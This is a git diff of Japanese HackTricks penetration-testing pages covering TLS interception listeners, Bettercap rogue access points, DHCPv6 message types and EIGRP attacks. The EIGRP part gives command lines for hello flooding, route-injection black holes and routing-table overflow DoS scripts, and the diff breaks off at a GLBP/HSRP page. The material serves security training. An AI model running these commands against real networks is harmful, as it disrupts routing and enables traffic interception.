**sslStripまたはsslStrip+はもはや機能しません。これは、ブラウザに事前保存されたHSTSルールがあるためです。したがって、ユーザーが"重要な"ドメインに初めてアクセスする場合でも、HTTPSでアクセスします。また、事前保存されたルールや他の生成されたルールには** [**`includeSubdomains`**](https://hstspreload.appspot.com) **フラグを使用できるため、以前の** _**wwww.facebook.com**_ **の例はもはや機能しません。** _**facebook.com**_ **は`includeSubdomains`を使用してHSTSを使用しているためです。**
TODO: easy-creds、evilgrade、metasploit、factory
## ポートでのTCPリスン
```
## ポートでのTCPリスン
```bash
sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -
```
@ -712,7 +737,7 @@ openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem
```
#### 証明書を使用してリッスン
#### 証明書を使用して盗聴
```
sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -
```
@ -723,7 +748,7 @@ sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FI
クライアントがCAが有効であるかどうかをチェックする場合、**CAによって署名された他のホスト名の証明書を提供**することがあります。\
もう1つの興味深いテストは、**リクエストされたホスト名の証明書を自己署名**で提供することです。
他にテストすることは、有効なCAでない有効な証明書で証明書に署名しようとすることです。また、有効な公開鍵を使用して証明書に署名し、ディフィー・ヘルマンなどのアルゴリズムを使用するよう強制し、クライアントが実際の秘密鍵で何も復号化する必要がないアルゴリズムを使用し、クライアントが実際の秘密鍵のプローブ(ハッシュなど)を要求するときに偽のプローブを送信し、クライアントがこれをチェックしないことを期待することです。
他にテストすることは、有効なCAでない有効な証明書で証明書に署名しようとすることです。また、有効な公開鍵を使用して証明書に署名し、ディフィー・ヘルマンなどのアルゴリズムを使用するよう強制し、クライアントが実際の秘密鍵で何も復号化する必要がないアルゴリズムを使用し、クライアントが実際の秘密鍵のプローブハッシュなどリクエストすると、偽のプローブを送信し、クライアントがこれをチェックしないことを期待することです。
## Bettercap
```bash
@ -751,17 +776,17 @@ set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap
```
### アクティブディスカバリーノート
### Active Discovery Notes
UDPパケットが要求されたポートを持たないデバイスに送信されると、ICMPポート到達不能が送信されることに注意してください。
### **ARPディスカバー**
### **ARP discover**
ARPパケットはネットワーク内で使用されているIPアドレスを発見するために使用されます。PCは各可能なIPアドレスに対してリクエストを送信し、使用されているものだけが応答します。
### **mDNSマルチキャストDNS**
Bettercapは、**\_services\_.dns-sd.\_udp.local**を要求するMDNSリクエストX msごとを送信します。このパケットを見たマシンは通常、このリクエストに応答します。その後、"services"に応答するマシンのみを検索します。
Bettercapは、**\_services\_.dns-sd.\_udp.local**を要求するMDNSリクエストXミリ秒ごとを送信し、このパケットを受信したマシンは通常このリクエストに応答します。その後、「services」に応答するマシンのみを検索します。
**ツール**
@ -773,17 +798,20 @@ Bettercapは、**\_services\_.dns-sd.\_udp.local**を要求するMDNSリクエ
Bettercapは、名前「CKAAAAAAAAAAAAAAAAAAAAAAAAAAA」を要求するためにポート137/UDPにブロードキャストパケットを送信します。
### **SSDPシンプルサービスディスカバリープロトコル**
### **SSDPSimple Service Discovery Protocol**
Bettercapは、すべての種類のサービスを検索するためにSSDPパケットをブロードキャストしますUDPポート1900
### **WSDWebサービスディスカバリー**
### **WSDWeb Service Discovery**
Bettercapは、サービスを検索するためにWSDパケットをブロードキャストしますUDPポート3702
## 参考文献
* [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
* **Network Security Assessment: Know Your Network第3版**
* **Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood**
* [https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**バグバウンティのヒント**: **Intigriti**に**サインアップ**して、ハッカーによって作成されたプレミアム**バグバウンティプラットフォーム**である**Intigriti**に参加しましょう!今すぐ[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)に参加して、最大**$100,000**のバウンティを獲得しましょう!
@ -792,14 +820,14 @@ Bettercapは、サービスを検索するためにWSDパケットをブロー
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong></a><strong></strong></summary>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
HackTricksをサポートする他の方法
* **HackTricksをPDFでダウンロード**したり、**HackTricksで企業を宣伝**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手す
* **HackTricksで企業を宣伝したり、HackTricksをPDFでダウンロードしたり**するには、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する
* ハッキングトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
</details>

92
generic-methodologies-and-resources/pentesting-network/dhcpv6.md
View file

@ -2,58 +2,62 @@
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする**
* **ハッキングトリックを共有するは、** [**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェック!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見る
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 **@hacktricks_live** をフォローする
* **ハッキングトリックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出する
</details>
### DHCPv6 vs. DHCPv4 メッセージタイプの比較
DHCPv6とDHCPv4のメッセージタイプの比較表は以下の通りです:
| DHCPv6 メッセージタイプ | DHCPv4 メッセージタイプ |
|:-------------------|:-------------------|
| Solicit (1) | DHCPDISCOVER |
| Advertise (2) | DHCPOFFER |
| Request (3), Renew (5), Rebind (6) | DHCPREQUEST |
| Reply (7) | DHCPACK / DHCPNAK |
| Release (8) | DHCPRELEASE |
| Information-Request (11) | DHCPINFORM |
| Decline (9) | DHCPDECLINE |
| Confirm (4) | なし |
| Reconfigure (10) | DHCPFORCERENEW |
| Relay-Forw (12), Relay-Reply (13) | なし |
**DHCPv6 メッセージタイプの詳細な説明:**
1. **Solicit (1)**: DHCPv6クライアントが利用可能なサーバーを見つけるために開始する。
2. **Advertise (2)**: Solicitに対するサーバーからの応答で、DHCPサービスの利用可能性を示す。
3. **Request (3)**: クライアントは特定のサーバーからIPアドレスやプレフィックスをリクエストするために使用する。
4. **Confirm (4)**: クライアントがネットワーク変更後に割り当てられたアドレスがまだ有効であるかを確認するために使用する。
5. **Renew (5)**: クライアントは元のサーバーにアドレスの有効期間を延長したり、構成を更新したりするためにこれを送信する。
6. **Rebind (6)**: Renewに応答がない場合に、アドレスの有効期間を延長したり、構成を更新したりするために任意のサーバーに送信される。
7. **Reply (7)**: サーバーはアドレス、構成パラメータ、またはReleaseやDeclineなどのメッセージを提供するためにこれを使用する。
8. **Release (8)**: クライアントは1つ以上の割り当てられたアドレスの使用を停止するためにサーバーに通知する。
9. **Decline (9)**: クライアントが割り当てられたアドレスがネットワーク上で競合していることを報告するために送信される。
10. **Reconfigure (10)**: サーバーは新しいまたは更新された構成のためにクライアントにトランザクションを開始するよう促す。
11. **Information-Request (11)**: IPアドレスの割り当てなしで構成パラメータをリクエストするためにクライアントが使用する。
12. **Relay-Forw (12)**: リレーエージェントがメッセージをサーバーに転送する。
13. **Relay-Repl (13)**: サーバーがリレーエージェントに応答し、それがクライアントにメッセージを配信する。
# 参考文献
* [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages)
<details>
| DHCPv6 メッセージタイプ | DHCPv4 メッセージタイプ |
| :--- | :--- |
| Solicit \(1\) | DHCPDISCOVER |
| Advertise \(2\) | DHCPOFFER |
| Request \(3\), Renew \(5\), Rebind \(6\) | DHCPREQUEST |
| Reply \(7\) | DHCPACK / DHCPNAK |
| Release \(8\) | DHCPRELEASE |
| Information-Request \(11\) | DHCPINFORM |
| Decline \(9\) | DHCPDECLINE |
| Confirm \(4\) | なし |
| Reconfigure \(10\) | DHCPFORCERENEW |
| Relay-Forw \(12\), Relay-Reply \(13\) | なし |
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
SOLICIT \(1\)
HackTricks をサポートする他の方法:
DHCPv6クライアントは、DHCPv6サーバーを見つけるためにSolicitメッセージを送信します。 ADVERTISE \(2\)
サーバーは、クライアントから受信したSolicitメッセージに対する応答として、DHCPサービスに利用可能であることを示すAdvertiseメッセージを送信します。 REQUEST \(3\)
クライアントは、特定のサーバーからIPアドレスやデリゲートされたプレフィックスを含む構成パラメータをリクエストするためにRequestメッセージを送信します。 CONFIRM \(4\)
クライアントは、リンクレイヤーの接続の変更を検出した場合や1つ以上のリースがまだ有効である場合に、クライアントが接続されているリンクにまだ適切であるかどうかを判断するために、利用可能なサーバーにConfirmメッセージを送信します。 Confirmメッセージは、クライアントが同じリンクにいるかどうか、または移動したかどうかを確認するために使用されます。実際のリースは検証されません。割り当てられたアドレスまたはデリゲートされたプレフィックスのプレフィックス部分のみが検証されます。 RENEW \(5\)
クライアントは、クライアントのアドレスと構成パラメータを最初に提供したサーバーにRenewメッセージを送信して、クライアントに割り当てられたアドレスの寿命を延長し、他の構成パラメータを更新します。 REBIND \(6\)
クライアントは、Renewメッセージに応答がない場合に、クライアントに割り当てられたアドレスの寿命を延長し、他の構成パラメータを更新するために、利用可能なサーバーにRebindメッセージを送信します。 REPLY \(7\)
サーバーは、クライアントから受信したSolicit、Request、Renew、Rebindメッセージに対する応答として、割り当てられたアドレスと構成パラメータを含むReplyメッセージを送信します。サーバーは、Information-requestメッセージに応答して構成パラメータを含むReplyメッセージを送信します。サーバーは、Confirmメッセージに応答して、クライアントに割り当てられたアドレスがクライアントが接続されているリンクに適切かどうかを確認するためのReplyメッセージを送信します。サーバーは、ReleaseまたはDeclineメッセージの受信を確認するためにReplyメッセージを送信します。 RELEASE \(8\)
クライアントは、クライアントに割り当てられたアドレスのうち1つ以上をもはや使用しないことを示すために、サーバーにReleaseメッセージを送信します。 DECLINE \(9\)
クライアントは、サーバーに1つ以上のアドレスが既にクライアントが接続されているリンクで使用されていることを示すために、Declineメッセージを送信します。 RECONFIGURE \(10\)
サーバーは、クライアントに新しいまたは更新された構成パラメータがあることを通知し、クライアントが更新された情報を受け取るためにサーバーとのRenew/ReplyまたはInformation-request/Replyトランザクションを開始するように指示するために、クライアントにReconfigureメッセージを送信します。 INFORMATION-REQUEST \(11\)
クライアントは、クライアントにIPアドレスを割り当てることなく、構成パラメータをリクエストするためにInformation-requestメッセージをサーバーに送信します。 RELAY-FORW \(12\)
リレーエージェントは、サーバーにメッセージをリレーするために、直接または他のリレーエージェントを介してサーバーにメッセージをリレーするためにRelay-forwardメッセージを送信します。受信したメッセージクライアントメッセージまたは他のリレーエージェントからのRelay-forwardメッセージは、Relay-forwardメッセージのオプション内にカプセル化されます。 RELAY-REPL \(13\)
サーバーは、クライアントに配信するメッセージを含むリレーリプライメッセージをリレーエージェントに送信します。リレーリプライメッセージは、他のリレーエージェントによって宛先リレーエージェントに配信される場合があります。サーバーは、クライアントメッセージをRelay-replyメッセージのオプションとしてカプセル化し、リレーエージェントがそれを抽出してクライアントに中継します。
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェック!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見る
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 で **@hacktricks_live** をフォローする
* **ハッキングトリックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出する
</details>

202
generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
View file

@ -2,148 +2,70 @@
<details>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**で**ゼロからヒーローまでAWSハッキングを学ぶ**</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>こちら</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見る
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする。
* **ハッキングトリックを共有するには、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
</details>
**このページは** [****](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) **に基づいています。詳細についてはそちらをご確認ください。**
## EIGRPプロトコルの脆弱性の理解 <a href="#0f82" id="0f82"></a>
**EIGRPEnhanced Interior Gateway Routing Protocol**は、動的なディスタンスベクトルルーティングプロトコルとして識別されています。認証やパッシブインターフェースの構成が無視されると、潜在的なルーティングテーブルの毒入れが発生する重大な脆弱性が観察されます。さらに、EIGRPネットワークまたは自律システムの構造は、ゾーンの区分の形式を欠いた非セグメント化されています。このフラットな構造は、攻撃者によって注入されたルートが自律システム全体に伝播する可能性があることを意味します。
![](../../.gitbook/assets/image (25) (1).png)
EIGRPシステムを悪用する最初のステップは、正規のEIGRPルーターとの接続を確立することです。この接続により、偵察からさまざまな形式のインジェクションまでの手段が開かれます。これを実現するために、UnixおよびLinuxシステム上のルーターをエミュレートするために、オープンソースのソリューションである[**FRRouting**](https://frrouting.org/)が利用されます。**FRRouting**は、BGP、OSPF、EIGRPを含む複数のプロトコルをサポートしています。攻撃者のシステムにFRRoutingを展開することで、ルーティングドメイン内で正規のルーターを模倣することが可能となります。システムにFRRを展開するための詳細な手順については後述します。
### ネットワークインテリジェンスの収集 <a href="#41e6" id="41e6"></a>
ルーティングドメインへの統合により、ネットワークの列挙と偵察が可能となり、広範なスキャンに比べて時間を節約できるだけでなく、IPS/IDSセキュリティシステムによる検出リスクを軽減できます。これを実現するには、**FRRouting**の展開が必要です。
デーモンのアクティビティを制御する`daemons`構成ファイルで変更が必要です。**eigrpd**デーモンのアクティベーションが必要です。
```bash
~# nano /etc/frr/daemons
eigrpd=yes
```
![](../../.gitbook/assets/image (15) (1).png)
さらに、さまざまなプロトコルの設定が1つのファイルに統合されるように、**vtysh.conf**ファイルを調整する必要があります。
```bash
~# nano /etc/frr/vtysh.conf
service integrated-vtysh-config
```
Post-configuration、FRRデーモンの起動とトラフィックルーティングの有効化Linuxディストリビューションではデフォルトで無効になっていますが必要です。
```bash
~$ sudo systemctl start frr
~$ sudo sysctl -w net.ipv4.ip_forward=1
```
![](../../.gitbook/assets/image (32).png)
**vtysh**コマンドはFRRルーターのコントロールパネルへのアクセスを提供します。
```bash
~$ sudo vtysh
```
例:
```bash
root# show version
```
> ノート: EIGRP ルーティングドメインは認証で保護されているかもしれません。ただし、ハローパケットから暗号ハッシュを抽出してパスワードをリセットすることで、潜在的なアクセスが依然として可能です。
グローバル構成モードで、**EIGRP** プロセスを開始し、自律システム番号を **1** と定義し、ネットワークの場所を指定します。
```bash
root# config
root(config)# router eigrp 1
root(config-router) network 10.10.100.50/32
```
EIGRPルーターとの正当な隣接接続の確立後この場合、**GW110.10.100.100**および**GW210.10.100.200**)、ルーターはルーティング情報を交換します。 このプロセスにより、攻撃システムのルーティングテーブルに新しいルートが表示され、ペネトレーションテストを支援し、サブネットスキャンにかかる時間を節約します。 この段階では、システムはEIGRPルーティングドメインの一部となり、さらなる攻撃ベクトルの開発に備えています。
![](../../.gitbook/assets/image (5) (1) (2).png)
![](../../.gitbook/assets/image (30) (1).png)
![](../../.gitbook/assets/image (29) (1) (2).png)
### EIGRPの悪用: 攻撃ベクトル <a href="#51ee" id="51ee"></a>
#### 1. 偽のEIGRP隣接
EIGRPハローパケットの大量送信は、ルーターのCPU過負荷を引き起こし、DoS攻撃の道を開く可能性があります。 このために**helloflooding.py**スクリプトが使用されますが、そのパケット送信速度はGILGlobal Interpreter Lockによって制限されています。 性能向上のためにスクリプトをC言語で書き直す計画が進行中です。
![](../../.gitbook/assets/image (2) (6) (1).png)
スクリプトの使用には、次の指定が必要です:
- ネットワークインターフェースeth0
- EIGRP自律システム番号1
- サブネットの場所10.10.100.0/24
```bash
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
```
#### 2. EIGRPブラックホール
この攻撃は、一般的にブラックホール攻撃と呼ばれる、トラフィックフローを妨害するために偽のルートを注入する攻撃です。この目的のために**routeinject.py**スクリプトが使用されます。例えば、`172.16.100.140/32`へのトラフィックを存在しない宛先にリダイレクトすることがあります。
スクリプトのパラメータには次のものが含まれます:
- 攻撃者のシステムインターフェース
- EIGRP AS番号
- 攻撃者のIPアドレス
- ターゲットサブネットIPとそのマスク
```bash
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
```
![](../../.gitbook/assets/image (20) (1).png)
ターゲットホストへの接続がルートインジェクションによって失われる結果となります。
![](../../.gitbook/assets/image (6) (1) (1).png)
#### 3. K-Valuesの悪用
EIGRPルーター間でのK-Valuesの不一致は、EIGRPドメインを混乱させる可能性があります。**relationshipnightmare.py**スクリプトは、変更されたK-Valuesを注入してEIGRPドメイン内で連続的な混乱と再接続を引き起こし、実質的にDoS攻撃を引き起こします。
![](../../.gitbook/assets/image (12) (2) (1).png)
スクリプトには以下が必要です:
- ネットワークインターフェース
- EIGRP AS番号
- 正規のルーターのIPアドレス
指定されたIPからマルチキャストEIGRP IPアドレスに送信される注入された変更により、不一致が引き起こされます。
```bash
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
```
![](../../.gitbook/assets/image (9) (1) (4).png)
![](../../.gitbook/assets/image (27) (1).png)
#### 4. ルーティングテーブルオーバーフロー
この攻撃は、偽のルートでルーティングテーブルを氾濫させ、ルーターのCPUとRAMを過負荷にします。**routingtableoverflow.py**スクリプトは、多数の偽のルートを迅速に送信することでこれを容易にします。
![](../../.gitbook/assets/image (3) (4).png)
スクリプトのパラメータ:
- ネットワークインターフェース
- EIGRP AS番号
- 攻撃者のIPアドレス
スクリプトを実行すると、ルーティングテーブルが不正なルートで満たされ、ルーターのパフォーマンスに深刻な影響を与えます。
```bash
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
```
![](../../.gitbook/assets/image (4) (4).png)
![](../../.gitbook/assets/image (21) (1).png)
<details>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じてゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**フォローする。**
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- 独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションである[**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)で**フォロー**する
- **ハッキングトリックを共有するには**、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
</details>
**これは** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) **で公開された攻撃の要約です。詳細についてはそちらをご覧ください。**
## **偽EIGRP隣接攻撃**
- **目的**: EIGRPハローパケットをフラッディングしてルーターのCPUを過負荷にし、サービス拒否DoS攻撃を引き起こす可能性がある。
- **ツール**: **helloflooding.py**スクリプト。
- **実行**:
```bash
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
```
- **パラメータ**:
- `--interface`: ネットワークインターフェースを指定します。例: `eth0`
- `--as`: EIGRP自律システム番号を定義します。例: `1`
- `--subnet`: サブネットの場所を設定します。例: `10.10.100.0/24`
## **EIGRPブラックホール攻撃**
- **目的**: 偽のルートを注入してネットワークトラフィックの流れを妨害し、トラフィックが存在しない宛先に向けられるブラックホールを作成する。
- **ツール**: **routeinject.py**スクリプト。
- **実行**:
```bash
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
```
- **パラメータ**:
- `--interface`: 攻撃者のシステムインターフェースを指定します。
- `--as`: EIGRP AS番号を定義します。
- `--src`: 攻撃者のIPアドレスを設定します。
- `--dst`: ターゲットサブネットIPを設定します。
- `--prefix`: ターゲットサブネットIPのマスクを定義します。
## **K-Values悪用攻撃**
- **目的**: 変更されたK-Valuesを注入することでEIGRPドメイン内で連続的な障害と再接続を作成し、実質的にDoS攻撃を引き起こす。
- **ツール**: **relationshipnightmare.py**スクリプト。
- **実行**:
```bash
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
```
- **パラメータ**:
- `--interface`: ネットワークインターフェースを指定します。
- `--as`: EIGRP AS番号を定義します。
- `--src`: 正規のルーターのIPアドレスを設定します。
## **ルーティングテーブルオーバーフローアタック**
- **目的**: 偽のルートを大量にルーティングテーブルにフラッディングして、ルーターのCPUとRAMを過負荷にする。
- **ツール**: **routingtableoverflow.py**スクリプト。
- **実行**:
```bash
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
```
- **パラメータ**:
- `--interface`: ネットワークインターフェースを指定します。
- `--as`: EIGRP AS番号を定義します。
- `--src`: 攻撃者のIPアドレスを設定します。

84
generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
View file

@ -1,62 +1,62 @@
# GLBP & HSRP Attacks
# GLBP & HSRP 攻撃
<details>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じてゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見る
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
- **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つけ
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegramグループ](https://t.me/peass) に参加するか、**Twitter** 🐦 で **@hacktricks_live** をフォローする
* **HackTricks****HackTricks Cloud** のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
</details>
## FHRPハイジャッキング概要
## FHRP ハイジャッキング概要
### FHRPの理解
First Hop Redundancy ProtocolFHRPは、複数の物理ルーターを1つの仮想エンティティに組み合わせることでネットワークの弾力性を確保するプロトコルスイートです。これにより負荷分散と障害耐性が向上します。Cisco Systemsは、GLBPとHSRPという2つの注目すべきFHRPプロトコルを導入しました。
### FHRP の洞察
FHRP は、複数のルーターを単一の仮想ユニットに統合することで、ネットワークの堅牢性を提供し、負荷分散と障害耐性を向上させるよう設計されています。Cisco Systems は、GLBP や HSRP などの主要なプロトコルをこのスイートで導入しました。
### GLBPプロトコルの詳細
Ciscoが開発したGLBPGateway Load Balancing Protocolは、TCP/IPスタックの上で動作し、通信にはポート3222でUDPを使用します。GLBPグループ内のルーターは、3秒ごとに「hello」パケットを送信します。ルーターからのこれらのパケットが10秒間欠落すると、そのルーターの障害が発生したと見なされます。ただし、これらのタイマー設定は調整可能です。
### GLBP プロトコルの洞察
